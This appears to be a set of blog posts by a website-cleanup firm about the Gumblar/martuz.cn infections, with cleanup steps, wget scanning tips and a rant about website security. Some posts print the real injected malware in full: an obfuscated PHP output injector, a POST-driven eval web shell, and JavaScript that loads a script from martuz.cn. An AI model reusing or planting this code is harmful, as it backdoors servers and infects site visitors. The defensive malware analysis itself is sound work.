By

A New Spin on martuz Website Infection

We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was an infectious website delivering malicious code with an email from Google.

This website owner had tried removing the code himself from the infected webpages and yet his site was still blacklisted by Google. This was killing his sales as anyone visiting with Firefox as their browser, or Chrome,  were greeted with a big warning:

This site may harm your computer.

After about a week of trying to rectify the problem himself, he contacted us.

He provided us FTP access to his site so we could tackle it.

After downloading his site (which literally took 3 hours) we started scanning. We grep’d for the word “base64_decode” and found over 228 php files all with the following malscript:

(php tag removed) if(!fun ct ion_ex ists(‘tmp_lkojfghx’)){if(is set ($_POST['tmp_lkojfghx3'])) eval($_POST['tmp_lkojfghx3']) ;if(!defined(‘TMP_XHGFJOKL’))
define(‘TMP_XHGFJOKL’,b ase64_de cod e(‘PHNjcmlwdCBsYW5ndWFnZT 1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBWaXRMPSclJzt2YXIgU3VvPSd2YXJfMjB
hXzNkXzIyU2NyaV83MHRFbmdfNjluZV8yMl8yY2JfM2RfMjJWZXJzaV82Zm4oKStfMjJfMmNqX zNkXzIyXzIyXzJjdV8zZG5hdl82OWdfNjF0XzZmcl8yZV83NV83M182NXJfNDF
nZW50XzNiaWYoXzI4dV8yZWluZGV4T2ZfMjhfMjJfNDNocl82Zl82ZGVfMjIpXzNjXzMwXzI5XzI2 XzI2KHVfMmVpbmRfNjV4T2YoXzIyV182OV82ZV8yMilfM2UwKV8yNl8yNl8
yOHVfMmVpbmRleF80Zl82Nl8yOF8yMk5UXzIwNl8yMilfM2MwKV8yNl8yNihfNjRvY183NW1fNjV uXzc0XzJlXzYzb29rXzY5ZV8yZWluXzY0ZXhPZihfMjJtaWVrXzNkMV8yMil
fM2NfMzApXzI2XzI2KF83NHlwZW9fNjYoXzdhXzcyXzc2enRzXzI5XzIxXzNkdHlwXzY1b182NihfMjJ BXzIyKSkpXzdienJfNzZ6Xzc0c18zZF8yMkFfMjJfM2Jldl82MWwoXzI
yaWYoXzc3aW5kXzZmd18yZV8yMithXzJiXzIyKWpfM2RqK18yMitfNjErXzIyXzRkYWpvcl8yMl8yY mIrYStfMjJNaW5vcl8yMitiK2ErXzIyQl83NWlfNmNkXzIyXzJiYitfMjJ
qXzNiXzIyKV8zYmRvY183NW1fNjVfNmVfNzRfMmV3cml0ZShfMjJfM2NfNzNfNjNyaV83MF83NF8y MHNfNzJjXzNkXzJmXzJmbWFyXzIyK18yMl83NF83NXpfMmVfNjNuXzJmdml
kXzJmXzNmXzY5ZF8zZF8yMitfNmErXzIyXzNlXzNjXzVjXzJmc2NyaXBfNzRfM2VfMjJfMjlfM2JfN2Qn O2V2YWwodW5lc2NhcGUoU3VvLnJlcGxhY2UoL18vZyxWaXRMKSkpfSk
oKTsKIC0tPjwvc2NyaXB0Pg==’));fu nc tion tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(su bstr($s,10,-8));
if(preg_match_all(‘#<script(.*?)</sc ri pt>#is’,$s,$a))for ea ch($a[0] as $v) f(count(exp lo de(“\n”,$v))>5)
{$e=preg_match(‘#[\'"][^\s\'”\.,;\?!\[\]:/<>\(\)]{30,}#’,$v)||preg_m atch(‘#[\(\[](\s*\d+,){20,}#’,$v);
if((pr eg_match(‘#\beval\b#’,$v)&&($e||str pos($v,’from Char Code’)))||($e&&strpos($v,’document.write’)))$s=str_replace($v,”,$s);}
$s1=preg_re pl ace(‘#<sc ri pt lan gu age=java scri pt><!– \n\(fun ct ion\(.+?\n –></script>#’,”,$s);if(stristr($s,'<body’))
$s=preg_replace(‘#(\s*<body)#mi’,TMP_XHGFJOKL.’\1′,$s1);elseif(($s1!=$s)||stristr($s,'</body’)||stristr($s,'</title>’))
$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0) {$s=array();

if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d); foreach(@ob_get_status(1) as $v)
if(($a=$v['name'])==’tmp_lkojfghx’)re t urn;else $s[]=array($a==’default output handler’?false:$a);
for($i=count($s)-1;$i>=0;$i–){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(‘tmp_lkojfghx’);
for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler(‘tmp_lkojfghx2′))!=’tmp_lkojfghx2′)
$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

The base64_decode section evaluates to this:

<script language=javascript><!–

(f u n c t i o n(){var VitL=’%';var Suo=’var_20a_3d_22Scri_70tEng_69ne_22_2cb_3d_22Versi_6fn()+_ 22_2cj_3d_22_22_2cu_3dnav_69g_61t_6fr_2e_75_73_65r_41gent_3bif
(_28u_2eindexOf_28_22_43hr_6f_6de_22)_3c_30_29_26_26(u_2eind_65xOf(_22W_69_6e_22) _3e0)_26_26_28u_2eindex_4f_66_28_22NT_206_22)_3c0)_26_26
(_64oc_75m_65n_74_2e_63ook_69e_2ein_64exOf(_22miek_3d1_22)_3c_30)_26_26(_74ypeo _66(_7a_72_76zts_29_21_3dtyp_65o_66(_22A_22)))
_7bzr_76z_74s_3d_22A_22_3bev_61l(_22if(_77ind_6fw_2e_22+a_2b_22)j_3dj+_22+_61+_ 22_4dajor_22_2bb+a+_22Minor_22+b+a+_22B_75i_6cd_22_2bb+_22j_3b_22)
_3bdoc_75m_65_6e_74_2ewrite(_22_3c_73_63ri_70_74_20s_72c_3d_2f_2fmar_22+_22_ 74_75z_2e_63n_2fvid_2f_3f_69d_3d_22+_6a+_22_3e_3c_5c_2fscrip_74_3e_22_29_3b_7d';
e v a l(un esc ape(Suo.replace(/_/g,VitL)))})();
–></script>

Which deobfuscates to:

var a=”S cri ptE ng ine”,b=”Version()+”,j=””,u=na vi g ator.user A gent;if((u.indexOf(“Ch rome”)<0)&&(u.indexOf(“Win”)>0)&&(u.indexOf(“NT 6″)<0)&&
(do cu ment.coo kie.ind exOf(“miek=1″)<0)&&(typeof(zrvzts)!=typeof(“A”))){zrvzts=”A”;ev al(“if(window.”+a+”)j=j+”+a+”Major”+b+a+”Minor”+b+a+”Build”+b+”j;”);
doc um ent.w ri te(“<sc ri pt src=//mar”+”tuz.cn/vid/?id=”+j+”><\/script>”);}
if(window.Script Engine)j=j+ScriptEng ineMajorVersion()+ScriptEng ineMinorVersion()+Scrip tEngine BuildVersion()+j;
<script src=//martuz.cn/vid/?id=></script>

a typical martuz infection.

Using PowerGrep we did a search and replace on this text and replaced every occurrence with “”.

We dug further into the files returned with our search for the word “base64_decode” and found 2 php files in every folder name “images”. These 2 files were named “image.php” and “gifimg.php” and inside each was the following code:

(php tags removed) eval(base64_decode(‘aWYoaXNzZXQoJF9QT1NUWydlJ10pKWV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1Rb J2UnXSkpOw==’)); (php tags removed)

Which decodes to:

if(isset($_POST['e']))eval(base64_decode($_POST['e']));

Which just decodes whatever text string is POST’d to this file.

To test, we encoded some commands and setup a little script to POST to this form with our commands. It worked!

In addition to these 2 files we found many others in various folders that contained the same code. We’re working on determining how these files are named. It almost seems random, but in order for this to be an automated process we feel that there must be some algorithm in creating the file names. Otherwise, the cybercriminals would have to keep a database or list of each site name and the file name associated with that site. This is highly unlikely as they are into automated routines and keeping a list like that just doesn’t make much sense.

Being that this was martuz, we felt confident in recommending that the client change from FTP to either FTPS or SFTP and then scan their PC fully before accessing the site again. With this new twist of having these php files accept scripts and run them, we are concerned about this new form of infection.

We have seen some people report that you have to replace these php files with an empty file of the same name. That might be the case in some situations, none that we’ve seen, but that would require that the cybercriminals had another file on your site that monitored those files. That monitoring program needs to be found and eliminated.

Another interesting thing about the file names is that WordPress installations have files named image.php obviously with different code, but that tactic might be to deter people from just “willy nilly” deleting those files.

Stay tuned as we have many, many more websites to clean. We’ll be reporting on them as we obtain more information.

By

New Website Infection Method

Working with a website owner recently, we came across a new method of delivering infectious code (drive-by downloads) – at least it’s a method we’ve never seen before.

The scenario: Website owner gets the email from Google telling them their website is serving up malscripts to visitors and adds “This website can harm your computer” to all their SERPs. The website owner can’t find the malscript anywhere.

We scan their site and find nothing. Our scanning spiders their site, all links and even spiders the sites they link to.

Someone from another vendor says they found malware on a webpage that we didn’t even see. I start screaming “Why didn’t we find this page?” We try to manually download the page and we get a 404 error – page not found.

Turns out, the page didn’t even exist. We try to access the non-existent webpage with a sandboxed browser (sandboxed means it’s a system that can’t be infected due to all the security measures we’ve taken. It also records any attempted file changes, registry changes, etc.).

Bam! We see in the 404 error page that there’s some redirect code in there trying to access martuz.cn. Interesting.

We look at the address bar in our browser and see that it didn’t redirect to a custom 404 error page, it still shows the URL we typed in with the john_doe.html page at the end. We know from our scan that this client is running their website on an Apache 2.0 server.

Our research showed that in the Apache installation folder under a sub-folder of “error”, the HTTP_NOT_FOUND file had been modified and the malscript added.

Which begs the question, why would a cybercriminal go through all that trouble to only deliver the martuz.cn malscript to people who type in a non-existent webpage?

Not sure on that one.

We also found these files had been added to the default directory on the webserver:

  • bad_gateway.html
  • bad_request.html
  • forbidden.html
  • internal_server_error.html
  • method_not_allowed.html
  • not_acceptable.html
  • not_found.html
  • not_implemented.html
  • precondition_failed.html
  • proxy_authentication_required.html
  • request-uri_too_long.html
  • unauthorized.html
  • unsupported_media_type.html

Each of these pages looked like the default Apache error pages but with the martuz.cn malscript inserted between the closing HEAD tag and the opening BODY tag.

We found that Apache uses one of 4 options when handling error responses:

  1. output a simple hardcoded error message
  2. output a customized message
  3. redirect to a local URL-path to handle the problem/error
  4. redirect to an external URL to handle the problem/error

It didn’t appear to be redirecting as the URL in the address bar was still what we had entered. So we eliminated options 3 & 4.

At first when we saw the malscript only being delivered with 404 responses, we thought that maybe there must be some line in the httpd.conf file like:

ErrorDocument 404 /404.html

But there was no such entry in the httpd.conf file. It was definitely the default Apache error page with the martuz malscript inserted.

Further investigation found our theory was correct.

Lesson: When trying to find all the infectious pages on your site, don’t overlook the non-existent webpages as well. In this particular case, those were the only files serving infectious code.

By

How To Find martuz.cn in Websites

After our post earlier today about how martuz.cn is the new domain for gumblar infections, we’ve received hundreds of emails from people (I guess too embarassed to post their question in an open forum), asking how to find martuz.cn in websites.

We’ll use a utility program called wget. Wget allows you to download the “raw” webpage from a site. It’s used quite heavily in the Linux world, but there is also a version for Windows users.

You can download wget from here: http://gnuwin32.sourceforge.net/packages/wget.htm

I recommend you select the Complete Package, except sources.

Download it, install it – you can just accept all of the defaults.

Now open a command prompt (Start->Run->cmd->OK).

Change directories like this: cd \”Program Files\GnuWin32\bin” <enter>

Let me explain a little about the options we’ll use with wget.

Sometimes these infectious malscripts like martuz.cn will only show themselves when viewed with a specific browser. In the recent days, martuz.cn won’t activate if you visit one of their infectious websites with Google Chrome as your browser. To be sure, we’ll set our user agent (which is what gets checked for your current browser) to Internet Explorer on a Windows XP computer.

Other times infectious malscripts like martuz.cn or certain variations of gumblar.cn will only try to infect a visitor’s PC if the visitor is coming to the infectious site from a Google search. In that case we would need to set “referer” to Google’s home page.

Here’s how we do it with wget. You would enter this in your command prompt:

wget –user-agent=’Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)’ –referer=http://www.google.com http://www.yoursitehere.com

Obviously you would change the http://www.yoursitehere.com with your webpage. For instance, if your website is http://www.joesbarandgrill.com you would simply use the above command but with http://www.joesbarandgrill.com in place of http://www.yoursitehere.com

This will download your homepage into the current directory on your PC.

If your site has already been indexed by Google and found to have infectious webpages, you can use this Google search to find out which pages Google has found malscripts on.

site:yoursitehere.com

The Search Engine Results Pages (SERPs) will show you each page from your site and any pages that Google thinks has malscripts on them will display their warning “This site may harm your computer”.

You should use wget for each page that Google lists as hosting malscripts by providing the complete URL in the wget command line.

For instance, if you have a webpage contactus.html and it’s listed in Google SERPs as hosting malscripts, then you would use this wget command:

wget –user-agent=’Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)’ –referer=http://www.google.com http://www.yoursitehere.com/contactus.html

That will download contactus.html into your current directory and you would scan that for any malscripts.

Now that you have downloaded your webpages into your current directory, you can begin the process of searching through the files.

While at your command prompt type in:

edit index.html

Then use search->find and type in the word: mart

The reason you don’t search for martuz.cn is that the cybercriminals know that would make it too easy for you to find. Their script (one of them we’ve found) looks like this:

var a="Script Engine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Chrome")<0)&&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.w rite("<script src=//mar tu"+"z.cn/vid/?id="+j+"><\/script>");}

So you can see that if you were to scan for martuz, you’d never find it because their malscript uses string concatentation to “build” martuz.cn (martu + z.cn)

Here’s another martuz script we found:

(f u n c t i o n(){var G33z1='%';var KlKj='va-72-20a-3d-22-53c-72i-70t-45n-67-69ne-22-2cb-3d-22-56-65-72-73-69o-6e(-29+-22-2cj-3d-22-22-2c-75-3d-6eavigato-72-2eus-65-72-41-67ent-3bi-66-28-28u-2e-69ndexOf(-22Chrome-22-29-3c0-29-26-26(u-2e-69ndexOf(-22W-69n-22-29-3e0)-26-26-28u-2ein-64e-78Of(-22-4eT-206-22)-3c0)-26-26(d-6fcument-2ecookie-2e-69-6edex-4ff-28-22-6die-6b-3d1-22)-3c-30)-26-26(type-6ff-28z-72vzts)-21-3dty-70e-6ff(-22A-22)-29)-7bz-72v-7ats-3d-22-41-22-3beval(-22if(window-2e-22-2b-61+-22)j-3dj+-22+a-2b-22Majo-72-22-2bb+a-2b-22Mi-6eo-72-22-2bb+a+-22-42uild-22+b+-22-6a-3b-22)-3bdoc-75m-65nt-2e-77rite(-22-3c-73-63ri-70-74-20src-3d-2f-2fm-61rtu-22+-22z-2ec-6e-2f-76id-2f-3fid-3d-22+j+-22-3e-3c-5c-2fs-63ri-70-74-3e-22)-3b-7d';var m8nw=KlKj.replace(/-/g,G33z1);e val(unescape(m8nw))})();

If you look at this second malscript you won’t find martuz or mart or any other text even close to the first malscript. If you find any script like this in your downloaded webpages, more than likely your site is serving infectious code. This is an example of the steps cybercriminals will go through to obfuscate their malscripts.

You’ll have to scan through each file on your website in order to see if you have any martuz.cn infections. If you do find them, you should scan your PC for any viruses with AVG, Avast or Malwarebytes, clean it, change the FTP password to your site and upload your last known, good backup. You do have a backup right?

We are working on a video to show you how to move away from FTP and use SSH/SCP instead, but we’re not quite ready with it yet.

If you subscribe to this blog, you’ll get an update when it’s ready.

Thank you. We hope you found this useful. If you have any questions, please email us or post your comments below.

By

New Domain – Same Damage

If you have a website, you may have had your website attacked by cybercriminals using the Gumblar.cn hack.

This hack was responsible for thousands of websites serving infectious code to their visitors.

However, the domain that was hosting further links to malicious downloads was gumblar.cn however, that domain has been shutdown and now many of the newer infections are using martuz.cn as their primary malicious download domain.

What the new code does is check to see if you are visiting using the Google Chrome browser on Windows XP and your browser is set to allow cookies.

I think, the reason behind this is to prevent the automated scanners from finding their infectious code. Many scanners don’t try different user agents, referers or allow cookies. This prevents them from finding these new malscripts.

We’ve even seen where sites had their robots.txt file modified and only the webpages that were serving up malscripts were inserted into the robots.txt so Google wouldn’t index them.

This all points to the fact that many people rely on Google to check their site for malscripts. Google will of course post their moniker “This site may harm your computer” on all of the Search Engine Result Pages (SERPs) and browsers like Google Chrome and Firefox will alert all visitors to the infectious website of it’s malware intentions. This typically will create a desire in some to notify the site owner who then goes into recovery mode to clean their site.

You can’t just scan your sites for any line that contains martuz.cn as the script files being inserted have obfuscated the domain name so it must be concatenated in order to see it. The malscripts are inserted into .htm, .html, .asp, .aspx, .js and .php files.

The cybercriminals have been very clever at disguising their malscripts.

It still appears that the way the cybercriminals gain access to websites is through a virus on the system that uploads to the website. This virus doesn’t seem to be detectable by many of the more popular anti-virus programs. We’ve worked with thousands of site owners, many of them had Norton or McAfee and they weren’t able to detect the virus.

We’ve been recommending AVG or Avast or Malwarebytes. These seem to find the virus after many scans with other anti-virus programs failed.

We also recommend getting away from FTP. We’re putting together some video instructions on the why’s and how’s of moving away from FTP. We’ll post here when we have them ready. It should be later this week.

Until then, watch your websites for any changes. It’s the only way.

By

The Internet Explosion

According to research, there are approximately 162 million websites on the Internet as of April 2008. To put this into perspective, in 1996 there were only 100,000.

Talk about a meteoric rise.

The cause of this growth has many roots.

First there are Internet Marketers (IMs) promoting “how to make money online”. This of course requires a website or more. Frequently IMs suggest you should have more than one website. These are referred to as “micro” sites. Micro sites are nothing more than a website with one or two web pages that get people interested in a “micro” niche to click over to your main site.

These micro sites are targeted with very specific, narrowly focused keywords to draw people in.

With unemployment so high, we have many people looking to make money online so the IMs are growing constantly which means the number of websites are growing as well.

Secondly, (notice I didn’t use “firstly” above – ugh) we have software makers pumping out “design a website in 30 minutes or less” products.

This makes many non-web developers think they can become web developers with no proper training. Many of the people in this category will remain self-proclaimed web developers and actually do more harm than good.

Also in this category we have many IMs creating websites that offer to help create websites – “with little or no training.” This is scary. Productive, but scary.

Note: Even my daughter has a website as a Math Teacher and my wife’s Aunt has developed a website for their vacation property. Their self-education is never ending and should be applauded. Both of these websites are under constant watch by me so I know they’re safe. [wink]

Third, we have the huge blog explosion.

There are so many blogs that Google has a separate category for searching through bl0gs on their Google Toolbar. (I know this because I use it frequently)

Why all of this concern about how many websites there are and how easy it is to create them?

I’m glad you asked.

This phenomenal growth of epic proportions has opened the door to cybercriminals. (You knew I was going to bring this around to hackers didn’t you?)

Really, it has.

Think about it. When the automobile was in it’s infancy and people could buy them without understanding them, owners had to bring them to specialists to fix them. Then as the market matured, people learned how to fix them themselves. Markets flourished with “how-to” books and auto parts stores.

In today’s world, auto mechanics are PhDs and knowledgeable in all things mechanical, electrical and electronic – the market has gone full circle. Once again fixing an automobile requires a specialist.

The Internet is the same way.

In the beginning web developers were in charge. The world couldn’t produce enough of them as the “dot com” bubble grew and grew and grew. The software tools weren’t what they are today. In 1998 you couldn’t take a course in Web Development – they simply weren’t offered.

Today, you can’t even watch the news on TV without the newscasters talking about following them on Twitter or Facebook. I see people at the gym on the treadmills using their cellphones to keep up on their Facebook friends. The Internet has reached epic proportions.

What the courses in Web Development don’t teach however is how to design a website that can’t be hacked. This is the real tragedy of this incredible growth.

Hackers know that with a potential pool of 162 million websites, they’re going to find many vulnerable to one of their attack methods. Cybercriminals know that many websites are created by non-specialists.

Not to say that all compromised websites serving malscripts to every Tom, Dick and Harry is the fault of web developers – it’s not. But even many experienced web developers lack proper security training.

Would you change your brake pads without bleeding the brake lines? (My father-in-law says “no”) Any good mechanic would tell you that just isn’t smart. That wouldn’t be safe.

We’ve been seeing a phenomenal growth in the number of websites serving up malscripts. Malscripts are made by hackers, inserted into legitimate websites that do nothing more than infect visitors with some remotely stored virus that gives the hacker remote control of the infected computer.

We frequently see requests like this in public forums and blogs:

“About a week ago Google posted a “this website might be harmful” message with our website listing. After review we have found out that someone has added damaging code to our software. we have been told it is http://removeddomain/E/J.JS/

IS THERE anyone out there that has experienced or knows this code and has advice on how to find and fix the problem. This is causing damage to our good name and service.”

The guy who owns this website is trying to conduct business on the Internet and hackers decide to make money off of him and in the process damage his company’s good name and service.

Now don’t you think that someone should have been watching that website? His concern is about his company and his reputation online but what about those who visited his website? Many of them probably don’t even know that just by visiting his website they were subjected to a computer infection.

Would you drive your car for years without ever bringing it in for service? Don’t you depend on those little indicator lights on your dashboard that tell you when your car needs servicing?

Why website owners aren’t more vigilant about their websites will remain a mystery to me. I guess many of them are so focused on their business that they don’t think about their website getting hacked.

That’s just my opinion.

Well, enough.

This rant will be closed with this erudite philosophy (thanks Ed):

“There is much to be said for modern journalism. By giving us the opinions of the uneducated, it keeps us in touch with the ignorance of the community. ” (Oscar Wilde)

The above post is my opinion – uneducated or not. You have now been kept in touch with the ignorance of the community.